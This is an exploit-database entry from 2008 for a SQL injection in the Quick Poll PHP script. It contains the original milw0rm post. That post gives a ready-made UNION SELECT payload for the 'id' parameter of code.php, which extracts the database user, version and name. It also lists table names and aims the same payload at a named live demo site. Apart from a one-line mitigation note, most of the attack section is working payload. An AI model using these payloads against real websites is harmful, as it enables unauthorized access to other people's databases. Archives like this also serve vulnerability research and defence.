Quick Poll (code.php id) Remote SQL Injection Vulnerability

vendor:

Quick Poll

by:

Hussin X

CVSS

HIGH

SQL Injection

CWE

Product Name: Quick Poll

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Quick Poll (code.php id) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The attacker can inject malicious SQL code in the 'id' parameter of the 'code.php' script. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

|___________________________________________________
|
| Quick Poll (code.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|
|    Author: Hussin X
|
|    Home :  http://www.iq-ty.com/
|
|    email:  darkangel_g85@Yahoo.com
|
|
|___________________________________________________
|
| script :http://discountedscripts.com/product_info.php?products_id=69
|
|___________________________________________________

Exploit:
________


Admin Name :

www.[target].com/Script/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers--


______________________

table_name : column_name

answers : poll
codes : poll
comments : poll
voted : poll


______________________





L!VE DEMO:
_________


http://www.discountedscripts.com/demos/newpoll/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers--




# EnD

Im IRAQi

# milw0rm.com [2008-11-12]